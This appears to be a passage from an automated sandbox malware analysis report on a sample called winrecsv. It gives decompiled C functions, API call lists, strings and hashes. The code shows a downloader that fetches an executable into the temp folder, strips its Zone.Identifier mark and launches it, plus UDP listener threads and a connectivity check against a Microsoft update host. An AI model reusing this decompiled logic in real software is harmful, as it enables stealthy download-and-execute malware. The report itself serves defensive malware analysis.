                                                                                  						 *((intOrPtr*)(_t31 + 0x14)) = CreateThread(0, 0, E0040DE70, _t31, 0, 0);
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					E0040E0A0(_t31, _t38);
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}





















                                                                                  0x0040dc40
                                                                                  0x0040dc40
                                                                                  0x0040dc48
                                                                                  0x0040dd34
                                                                                  0x0040dc56
                                                                                  0x0040dc65
                                                                                  0x0040dc6b
                                                                                  0x0040dc71
                                                                                  0x0040dc78
                                                                                  0x0040dc84
                                                                                  0x0040dc87
                                                                                  0x0040dc8d
                                                                                  0x0040dc93
                                                                                  0x0040dc95
                                                                                  0x0040dc9a
                                                                                  0x0040dc9a
                                                                                  0x0040dc9e
                                                                                  0x0040dd2e
                                                                                  0x00000000
                                                                                  0x0040dd30
                                                                                  0x0040dca6
                                                                                  0x0040dcaa
                                                                                  0x0040dcae
                                                                                  0x0040dcb2
                                                                                  0x0040dcb7
                                                                                  0x0040dcc1
                                                                                  0x0040dcc5
                                                                                  0x0040dcca
                                                                                  0x0040dcd9
                                                                                  0x0040dcde
                                                                                  0x0040dce3
                                                                                  0x0040dcec
                                                                                  0x0040dcfd
                                                                                  0x0040dd06
                                                                                  0x0040dd22
                                                                                  0x0040dd2b
                                                                                  0x00000000
                                                                                  0x0040dd2b
                                                                                  0x0040dd08
                                                                                  0x0040dd13
                                                                                  0x0040dd13

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040DC78
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DC87
                                                                                  • htons.WS2_32(00009E34), ref: 0040DCCA
                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040DCEC
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040DCFD
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,00009E34,0040DD0D), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?), ref: 0040E0C7
                                                                                  • CreateThread.KERNEL32 ref: 0040DD25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4174406920-0
                                                                                  • Opcode ID: a2cb8cc6186e6c3a51c62c868e61c9eae69381ded1f00a42377871376424311b
                                                                                  • Instruction ID: e4b1bb25e16b1a4212620234c740e3462210c18eb357fd28b9ad958c2a756cf5
                                                                                  • Opcode Fuzzy Hash: a2cb8cc6186e6c3a51c62c868e61c9eae69381ded1f00a42377871376424311b
                                                                                  • Instruction Fuzzy Hash: B0219FB4644301AEE710DFB48C8AB5B76A0AF48710F50897EFA54DE2C1D7F8C848876A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040B8F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				intOrPtr _t43;
                                                                                  
                                                                                  				_v12 = _a16;
                                                                                  				if(_a16 != 0xffffffff) {
                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                  				}
                                                                                  				_v8 = _a8;
                                                                                  				while(1) {
                                                                                  					_v16 = 0;
                                                                                  					_t38 = _a4;
                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                  					if(_t38 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_v16 > 0) {
                                                                                  						if(_v16 >= _a12) {
                                                                                  							_v24 = _a12;
                                                                                  						} else {
                                                                                  							_v24 = _v16;
                                                                                  						}
                                                                                  						_t43 = _a4;
                                                                                  						__imp__#16(_t43, _v8, _v24, 0);
                                                                                  						_v20 = _t43;
                                                                                  						if(_v20 > 0) {
                                                                                  							if(_a16 != 0xffffffff) {
                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                  							}
                                                                                  							_a12 = _a12 - _v20;
                                                                                  							_v8 = _v8 + _v20;
                                                                                  						}
                                                                                  					}
                                                                                  					Sleep(1);
                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                  						L15:
                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                  					} else {
                                                                                  						continue;
                                                                                  					}
                                                                                  				}
                                                                                  				goto L15;
                                                                                  			}










                                                                                  0x0040b8f9
                                                                                  0x0040b900
                                                                                  0x0040b90b
                                                                                  0x0040b90b
                                                                                  0x0040b911
                                                                                  0x0040b914
                                                                                  0x0040b914
                                                                                  0x0040b924
                                                                                  0x0040b928
                                                                                  0x0040b931
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040b939
                                                                                  0x0040b941
                                                                                  0x0040b94e
                                                                                  0x0040b943
                                                                                  0x0040b946
                                                                                  0x0040b946
                                                                                  0x0040b95b
                                                                                  0x0040b95f
                                                                                  0x0040b965
                                                                                  0x0040b96c
                                                                                  0x0040b972
                                                                                  0x0040b97d
                                                                                  0x0040b97d
                                                                                  0x0040b986
                                                                                  0x0040b98f
                                                                                  0x0040b98f
                                                                                  0x0040b96c
                                                                                  0x0040b994
                                                                                  0x0040b9a3
                                                                                  0x0040b9af
                                                                                  0x0040b9bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040b9a3
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040B902
                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B928
                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B95F
                                                                                  • GetTickCount.KERNEL32 ref: 0040B974
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040B994
                                                                                  • GetTickCount.KERNEL32 ref: 0040B99A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                  • String ID:
                                                                                  • API String ID: 107502007-0
                                                                                  • Opcode ID: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction ID: b5ebabbcfa87b5d5b6093c606dafa0a0568610fd24292d9ee39f828ceab0bc2d
                                                                                  • Opcode Fuzzy Hash: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction Fuzzy Hash: 2831F0B4900209DFCB04DFA8D948BEE7BB1FF44315F108669E915A3390D7749A90CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 16%
                                                                                  			E00409880() {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				short _v30;
                                                                                  				short _v34;
                                                                                  				short _v38;
                                                                                  				intOrPtr _v40;
                                                                                  				short _v42;
                                                                                  				char _v44;
                                                                                  				char _v48;
                                                                                  				intOrPtr _t28;
                                                                                  				char* _t30;
                                                                                  
                                                                                  				_v8 = 0xffffffff;
                                                                                  				_v24 = 0;
                                                                                  				_v22 = 0;
                                                                                  				_v18 = 0;
                                                                                  				_v14 = 0;
                                                                                  				_v10 = 0;
                                                                                  				_v24 = 2;
                                                                                  				__imp__#9(0x50);
                                                                                  				_v22 = 0;
                                                                                  				_t28 = E00409840("www.update.microsoft.com");
                                                                                  				_v20 = _t28;
                                                                                  				__imp__#23(2, 1, 0);
                                                                                  				_v28 = _t28;
                                                                                  				if(_v28 != 0xffffffff) {
                                                                                  					_t30 =  &_v24;
                                                                                  					__imp__#4(_v28, _t30, 0x10);
                                                                                  					if(_t30 == 0) {
                                                                                  						_v44 = 0;
                                                                                  						_v42 = 0;
                                                                                  						_v38 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v48 = 0x10;
                                                                                  						__imp__#6(_v28,  &_v44,  &_v48);
                                                                                  						_v8 = _v40;
                                                                                  					}
                                                                                  					E00409940(_v28);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}




















                                                                                  0x00409886
                                                                                  0x0040988f
                                                                                  0x00409895
                                                                                  0x00409898
                                                                                  0x0040989b
                                                                                  0x0040989e
                                                                                  0x004098a7
                                                                                  0x004098ad
                                                                                  0x004098b3
                                                                                  0x004098bc
                                                                                  0x004098c4
                                                                                  0x004098cd
                                                                                  0x004098d3
                                                                                  0x004098da
                                                                                  0x004098de
                                                                                  0x004098e6
                                                                                  0x004098ee
                                                                                  0x004098f2
                                                                                  0x004098f8
                                                                                  0x004098fb
                                                                                  0x004098fe
                                                                                  0x00409901
                                                                                  0x00409905
                                                                                  0x00409918
                                                                                  0x00409921
                                                                                  0x00409921
                                                                                  0x00409928
                                                                                  0x0040992d
                                                                                  0x00409936

                                                                                  APIs
                                                                                  • htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409840: inet_addr.WS2_32(004098C1), ref: 0040984A
                                                                                    • Part of subcall function 00409840: gethostbyname.WS2_32(?), ref: 0040985D
                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  Strings
                                                                                  • www.update.microsoft.com, xrefs: 004098B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                  • String ID: www.update.microsoft.com
                                                                                  • API String ID: 4063137541-1705189816
                                                                                  • Opcode ID: 41d3bc95c2ae44e72b32e24321ad9851a133240d3f3aeb102b77493bcdced1bd
                                                                                  • Instruction ID: 4856549373dc0ba92a891a61f9ce0befa44decce286b311d22d51fdce19958fb
                                                                                  • Opcode Fuzzy Hash: 41d3bc95c2ae44e72b32e24321ad9851a133240d3f3aeb102b77493bcdced1bd
                                                                                  • Instruction Fuzzy Hash: A121F9B5E102099BCB04DFF8D946AEEBBB5AF08310F10816DE519F3390E7745A45CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 22%
                                                                                  			E0040E110(void* __edi) {
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				char _v28;
                                                                                  				void* __ebx;
                                                                                  				void* _t15;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t27 = __edi;
                                                                                  				_t24 = E00408E40(0x24);
                                                                                  				 *_t24 = 0x756470;
                                                                                  				 *(_t24 + 4) = 1;
                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                  				__imp__#23(2, 2, 0x11);
                                                                                  				 *(_t24 + 8) = _t15;
                                                                                  				if(_t15 == 0xffffffff) {
                                                                                  					E0040E0A0(_t24, __edi);
                                                                                  					_t24 = 0;
                                                                                  				}
                                                                                  				if(_t24 == 0) {
                                                                                  					L6:
                                                                                  					return _t24;
                                                                                  				} else {
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10);
                                                                                  					if(2 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                  						 *((intOrPtr*)(_t24 + 0x14)) = CreateThread(0, 0, E0040DE70, _t24, 0, 0);
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						E0040E0A0(_t24, _t27);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}












                                                                                  0x0040e110
                                                                                  0x0040e122
                                                                                  0x0040e128
                                                                                  0x0040e12e
                                                                                  0x0040e135
                                                                                  0x0040e141
                                                                                  0x0040e144
                                                                                  0x0040e14a
                                                                                  0x0040e150
                                                                                  0x0040e152
                                                                                  0x0040e157
                                                                                  0x0040e157
                                                                                  0x0040e15b
                                                                                  0x0040e1ba
                                                                                  0x0040e1c0
                                                                                  0x0040e15d
                                                                                  0x0040e15f
                                                                                  0x0040e163
                                                                                  0x0040e167
                                                                                  0x0040e16b
                                                                                  0x0040e17b
                                                                                  0x0040e185
                                                                                  0x0040e18e
                                                                                  0x0040e1ae
                                                                                  0x0040e1b7
                                                                                  0x00000000
                                                                                  0x0040e190
                                                                                  0x0040e190
                                                                                  0x0040e19b
                                                                                  0x0040e19b
                                                                                  0x0040e18e

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040C2CE,00000000), ref: 0040E135
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040E144
                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040E185
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,00009E34,0040DD0D), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?), ref: 0040E0C7
                                                                                  • CreateThread.KERNEL32 ref: 0040E1B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3943618503-0
                                                                                  • Opcode ID: d6b533783e4c3d5a0b0c07ca28ff5c32efd1b8c96d42e38e33aba7220e01ff04
                                                                                  • Instruction ID: 22c9fd0d58bb21ad2c775b164571bc0b545b0ff679c75b8c31fe2abd1e05f37e
                                                                                  • Opcode Fuzzy Hash: d6b533783e4c3d5a0b0c07ca28ff5c32efd1b8c96d42e38e33aba7220e01ff04
                                                                                  • Instruction Fuzzy Hash: E1119170640300AFE7509FB4DC86B5B7AE0EF48710F54897AFA58DE2D2E6F8D844875A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D890(char* _a4, signed int _a8) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				signed char _v1045;
                                                                                  				short _v1572;
                                                                                  				void* _v1576;
                                                                                  				void* _v1580;
                                                                                  				short _v2100;
                                                                                  				void _v2364;
                                                                                  				long _v2368;
                                                                                  				long _v2372;
                                                                                  				void* _v2376;
                                                                                  				intOrPtr* _v2380;
                                                                                  				intOrPtr _v2384;
                                                                                  				char _v2385;
                                                                                  				intOrPtr _v2392;
                                                                                  				signed int _t88;
                                                                                  				signed int _t90;
                                                                                  				int _t96;
                                                                                  				signed int _t97;
                                                                                  				signed int _t99;
                                                                                  				signed int _t101;
                                                                                  				signed int _t111;
                                                                                  				signed char _t125;
                                                                                  				signed char _t127;
                                                                                  				void* _t181;
                                                                                  				void* _t182;
                                                                                  				void* _t184;
                                                                                  
                                                                                  				srand(GetTickCount());
                                                                                  				_t182 = _t181 + 4;
                                                                                  				_v1045 = 0;
                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                  				_v2380 = _a4;
                                                                                  				_v2384 = _v2380 + 1;
                                                                                  				do {
                                                                                  					_v2385 =  *_v2380;
                                                                                  					_v2380 = _v2380 + 1;
                                                                                  				} while (_v2385 != 0);
                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                  				_t88 = rand();
                                                                                  				asm("cdq");
                                                                                  				_t90 = rand();
                                                                                  				asm("cdq");
                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                  				_t184 = _t182 + 0x20;
                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 0, 0, 0, 0);
                                                                                  				if(_v2376 != 0) {
                                                                                  					_v1576 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0);
                                                                                  					if(_v1576 != 0) {
                                                                                  						_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                  							while(InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372) != 0 && _v2372 != 0) {
                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0);
                                                                                  							}
                                                                                  							CloseHandle(_v1580);
                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  							DeleteFileW( &_v524);
                                                                                  							Sleep(0x3e8);
                                                                                  							_t125 = E0040D580( &_v1572);
                                                                                  							_t184 = _t184 + 0x10;
                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                  								DeleteFileW( &_v1572);
                                                                                  							} else {
                                                                                  								Sleep(0x7d0);
                                                                                  								_t127 = E0040D740( &_v1572);
                                                                                  								_t184 = _t184 + 4;
                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v1045 = 1;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						CloseHandle(_v1580);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v1576);
                                                                                  				}
                                                                                  				InternetCloseHandle(_v2376);
                                                                                  				Sleep(0x3e8);
                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                  				if(_t96 == 0) {
                                                                                  					_t97 = rand();
                                                                                  					asm("cdq");
                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                  					_t99 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t101 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push( &_v1572);
                                                                                  					_push( &_v1044);
                                                                                  					_push(0);
                                                                                  					L0040F052();
                                                                                  					if(_t96 == 0) {
                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  						DeleteFileW( &_v524);
                                                                                  						Sleep(0x3e8);
                                                                                  						if((E0040D580( &_v1572) & 0x000000ff) == 0) {
                                                                                  							return DeleteFileW( &_v1572);
                                                                                  						}
                                                                                  						Sleep(0x7d0);
                                                                                  						_t111 = E0040D740( &_v1572) & 0x000000ff;
                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                  							return _t111;
                                                                                  						} else {
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t96;
                                                                                  			}






























                                                                                  0x0040d8a0
                                                                                  0x0040d8a5
                                                                                  0x0040d8a8
                                                                                  0x0040d8c0
                                                                                  0x0040d8c9
                                                                                  0x0040d8d8
                                                                                  0x0040d8de
                                                                                  0x0040d8e6
                                                                                  0x0040d8ec
                                                                                  0x0040d8f3
                                                                                  0x0040d908
                                                                                  0x0040d923
                                                                                  0x0040d92b
                                                                                  0x0040d930
                                                                                  0x0040d93f
                                                                                  0x0040d944
                                                                                  0x0040d966
                                                                                  0x0040d96c
                                                                                  0x0040d982
                                                                                  0x0040d98f
                                                                                  0x0040d9b1
                                                                                  0x0040d9be
                                                                                  0x0040d9e0
                                                                                  0x0040d9ed
                                                                                  0x0040d9f3
                                                                                  0x0040da3e
                                                                                  0x0040da3e
                                                                                  0x0040da4d
                                                                                  0x0040da66
                                                                                  0x0040da76
                                                                                  0x0040da81
                                                                                  0x0040da8e
                                                                                  0x0040da93
                                                                                  0x0040da9b
                                                                                  0x0040dae0
                                                                                  0x0040da9d
                                                                                  0x0040daa2
                                                                                  0x0040daaf
                                                                                  0x0040dab4
                                                                                  0x0040dabd
                                                                                  0x0040dac6
                                                                                  0x0040daca
                                                                                  0x0040daca
                                                                                  0x0040dad0
                                                                                  0x0040dad0
                                                                                  0x0040dad7
                                                                                  0x0040da9b
                                                                                  0x0040daed
                                                                                  0x0040daed
                                                                                  0x0040dafa
                                                                                  0x0040dafa
                                                                                  0x0040db07
                                                                                  0x0040db12
                                                                                  0x0040db18
                                                                                  0x0040db21
                                                                                  0x0040db27
                                                                                  0x0040db2c
                                                                                  0x0040db3e
                                                                                  0x0040db44
                                                                                  0x0040db49
                                                                                  0x0040db58
                                                                                  0x0040db5d
                                                                                  0x0040db7f
                                                                                  0x0040db88
                                                                                  0x0040db8a
                                                                                  0x0040db92
                                                                                  0x0040db99
                                                                                  0x0040db9a
                                                                                  0x0040db9c
                                                                                  0x0040dba3
                                                                                  0x0040dbbc
                                                                                  0x0040dbcc
                                                                                  0x0040dbd7
                                                                                  0x0040dbf1
                                                                                  0x00000000
                                                                                  0x0040dc2e
                                                                                  0x0040dbf8
                                                                                  0x0040dc0d
                                                                                  0x0040dc12
                                                                                  0x00000000
                                                                                  0x0040dc1d
                                                                                  0x0040dc1f
                                                                                  0x0040dc1f
                                                                                  0x0040dc12
                                                                                  0x0040dba3
                                                                                  0x0040dc37

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040D899
                                                                                  • srand.MSVCRT ref: 0040D8A0
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D8C0
                                                                                  • mbstowcs.NTDLL ref: 0040D923
                                                                                  • rand.MSVCRT ref: 0040D92B
                                                                                  • rand.MSVCRT ref: 0040D93F
                                                                                  • wsprintfW.USER32 ref: 0040D966
                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D97C
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D9AB
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D9DA
                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040DA0D
                                                                                  • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040DA3E
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040DA4D
                                                                                  • wsprintfW.USER32 ref: 0040DA66
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DA76
                                                                                  • ExitProcess.KERNEL32 ref: 0040DACA
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DAA2
                                                                                    • Part of subcall function 0040D740: memset.NTDLL ref: 0040D74E
                                                                                    • Part of subcall function 0040D740: CreateProcessW.KERNEL32 ref: 0040D795
                                                                                    • Part of subcall function 0040D740: Sleep.KERNEL32(000003E8), ref: 0040D7A5
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DAE0
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040DAED
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DAFA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DB07
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DB12
                                                                                  • rand.MSVCRT ref: 0040DB27
                                                                                  • Sleep.KERNEL32 ref: 0040DB3E
                                                                                  • rand.MSVCRT ref: 0040DB44
                                                                                  • rand.MSVCRT ref: 0040DB58
                                                                                  • wsprintfW.USER32 ref: 0040DB7F
                                                                                  • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040DB9C
                                                                                  • wsprintfW.USER32 ref: 0040DBBC
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DBCC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DBD7
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DA81
                                                                                    • Part of subcall function 0040D580: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                    • Part of subcall function 0040D580: CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                    • Part of subcall function 0040D580: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                    • Part of subcall function 0040D580: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DBF8
                                                                                  • ExitProcess.KERNEL32 ref: 0040DC1F
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DC2E
                                                                                  Strings
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D977
                                                                                  • %s\%d%d.exe, xrefs: 0040D95A
                                                                                  • %s\%d%d.exe, xrefs: 0040DB73
                                                                                  • %temp%, xrefs: 0040D8BB
                                                                                  • %s:Zone.Identifier, xrefs: 0040DBB0
                                                                                  • %s:Zone.Identifier, xrefs: 0040DA5A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3135114409-2996245764
                                                                                  • Opcode ID: ed997d2d8adc84e834c24ccd0979c921d068e9e5e7f299f91d7423c8729aec1f
                                                                                  • Instruction ID: 9292b30b737f4007fadc37ef56157f39d8097e5f89b4cfd55e16e9e87d2adf29
                                                                                  • Opcode Fuzzy Hash: ed997d2d8adc84e834c24ccd0979c921d068e9e5e7f299f91d7423c8729aec1f
